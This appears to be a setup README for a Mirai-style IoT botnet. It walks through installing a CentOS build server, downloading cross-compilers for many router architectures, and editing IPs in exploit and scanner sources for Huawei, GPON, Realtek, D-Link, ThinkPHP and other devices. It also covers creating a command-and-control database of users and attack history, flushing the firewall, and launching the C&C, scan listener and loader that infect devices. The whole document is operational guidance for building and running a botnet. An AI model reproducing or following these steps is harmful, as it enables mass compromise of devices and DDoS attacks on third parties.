Setup write by vantrong
Install on Centos 7.x
Basic configuration of vps: 2vCores 4GB RAM 20SSD


yum update -y
yum install epel-release -y
yum groupinstall "Development Tools" -y
yum install gmp-devel -y
ln -s /usr/lib64/libgmp.so.3  /usr/lib64/libgmp.so.10
yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y


// Install golang to fix build.sh
1. wget https:/go.dev/dl/go1.21.3.linux-amd64.tar.gz
2. rm -rf /usr/local/go && tar -C /usr/local -xzf go1.21.3.linux-amd64.tar.gz
3. export PATH=$PATH:/usr/local/go/bin
4. go version
5. go version
6. go env -w GO111MODULE=off
7. go get -u github.com/go-sql-driver/mysql



mkdir /etc/xcompile
cd /etc/xcompile
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-i586.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-i686.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-m68k.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-mips.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-mipsel.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-powerpc.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-sh4.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-sparc.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv4l.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv5l.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv6l.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-armv7l.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-powerpc-440fp.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-x86_64.tar.bz2
wget https://mirailovers.io/HELL-ARCHIVE/COMPILERS/cross-compiler-i486.tar.gz

tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-m68k.tar.bz2
tar -jxf cross-compiler-mips.tar.bz2
tar -jxf cross-compiler-mipsel.tar.bz2
tar -jxf cross-compiler-powerpc.tar.bz2
tar -jxf cross-compiler-sh4.tar.bz2
tar -jxf cross-compiler-i586.tar.bz2
tar -jxf cross-compiler-i686.tar.bz2
tar -jxf cross-compiler-sparc.tar.bz2
tar -jxf cross-compiler-armv4l.tar.bz2
tar -jxf cross-compiler-armv5l.tar.bz2
tar -jxf cross-compiler-armv6l.tar.bz2
tar -jxf cross-compiler-armv7l.tar.bz2
tar -vxf arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install.tar.gz
tar -jxf cross-compiler-powerpc-440fp.tar.bz2
tar -jxf cross-compiler-x86_64.tar.bz2
tar -xvf cross-compiler-i486.tar.gz

rm -rf *.tar.bz2
rm -rf *.tar.gz
rm -rf *.tar
rm -rf *.tar.xz

mv cross-compiler-i486 i486
mv cross-compiler-i586 i586
mv cross-compiler-i686 i686
mv cross-compiler-m68k m68k
mv cross-compiler-mips mips
mv cross-compiler-mipsel mipsel
mv cross-compiler-powerpc powerpc
mv cross-compiler-sh4 sh4
mv cross-compiler-sparc sparc
mv cross-compiler-armv4l armv4l
mv cross-compiler-armv5l armv5l
mv cross-compiler-armv6l armv6l
mv cross-compiler-armv7l armv7l
mv arc_gnu_2017.09_prebuilt_uclibc_le_arc700_linux_install arc
mv cross-compiler-powerpc-440fp powerpc-440fp
mv cross-compiler-x86_64 x86_64


 CHANGE IP(s) IN /bot/includes.h
 CHANGE IP(s) IN /bot/huawei.c
 CHANGE IP(s) IN /bot/asus.c
 CHANGE IP(s) IN /bot/comtrend.c
 CHANGE IP(s) IN /bot/dlink_scanner.c
 CHANGE IP(s) IN /bot/gpon443.c
 CHANGE IP(s) IN /bot/jaws.c
 CHANGE IP(s) IN /bot/linksys.c
 CHANGE IP(s) IN /bot/gpon80_scanner.c
 CHANGE IP(s) IN /bot/netlink.c
 CHANGE IP(s) IN /bot/tr064.c
 CHANGE IP(s) IN /bot/realtek.c
 CHANGE IP(s) IN /bot/thinkphp.c
 CHANGE IP(s) IN /bot/hnap_scanner.c
 CHANGE IP(s) IN /cnc/main.go
 CHANGE IP(s) IN /loader/src/main.c
 CHANGE IP(s) IN /loader/src/headers/config.h
 CHANGE IP(s) IN /scanListen.go
 CHANGE IP(s) IN /dlr/main.c
------------------------------
------------------------------------------

// Install mysql on centos 7.x

yum install mariadb-server -y
systemctl start mariadb.service
mysql_secure_installation
AND CHANGE YOUR PASSWORD MYSQL IN cnc/main.go


mysql -pYOURPASSWORD


CREATE DATABASE cosmic;
use cosmic;
CREATE TABLE `history` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `user_id` int(10) unsigned NOT NULL,
  `time_sent` int(10) unsigned NOT NULL,
  `duration` int(10) unsigned NOT NULL,
  `command` text NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  PRIMARY KEY (`id`),
  KEY `user_id` (`user_id`)
);
 
CREATE TABLE `users` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `username` varchar(32) NOT NULL,
  `password` varchar(32) NOT NULL,
  `duration_limit` int(10) unsigned DEFAULT NULL,
  `cooldown` int(10) unsigned NOT NULL,
  `wrc` int(10) unsigned DEFAULT NULL,
  `last_paid` int(10) unsigned NOT NULL,
  `max_bots` int(11) DEFAULT '-1',
  `admin` int(10) unsigned DEFAULT '0',
  `intvl` int(10) unsigned DEFAULT '30',
  `api_key` text,
  PRIMARY KEY (`id`),
  KEY `username` (`username`)
);
 
CREATE TABLE `whitelist` (
  `id` int(10) unsigned NOT NULL AUTO_INCREMENT,
  `prefix` varchar(16) DEFAULT NULL,
  `netmask` tinyint(3) unsigned DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `prefix` (`prefix`)
);
INSERT INTO users VALUES (NULL, 'USERNAME', 'PASSWORD', 0, 0, 0, 0, -1, 1, 30, '');
INSERT INTO users VALUES (NULL, 'USERNAME2', 'PASSWORD2', 0, 0, 0, 0, -1, 1, 30, '');
exit;

------------------------------------------------------------------------------------

iptables -F 
service httpd restart  
service mariadb.service restart

------------------------------------------------------------------------------------



nano /usr/include/bits/typesizes.h
scroll down and edit the 1024 to 999999
THEN SAVE IT 
ulimit -n999999; ulimit -u999999; ulimit -e999999

------------------------------------------------------------------------------------
cd ~/
chmod 0777 * -R
sh build.sh
ulimit -n999999; ulimit -u999999; ulimit -e999999

cd
screen ./cnc
CTRL A+D

cd loader
screen ./scanListen
CTRL A+D

// How to connect botnet server
Telnet port 1312

// How to load bots
cd loader
cat *.txt | ./loader

NOTE: Use exploit to get more bots, all instructions are in the files
 ------------------------------------------------------------------------------------
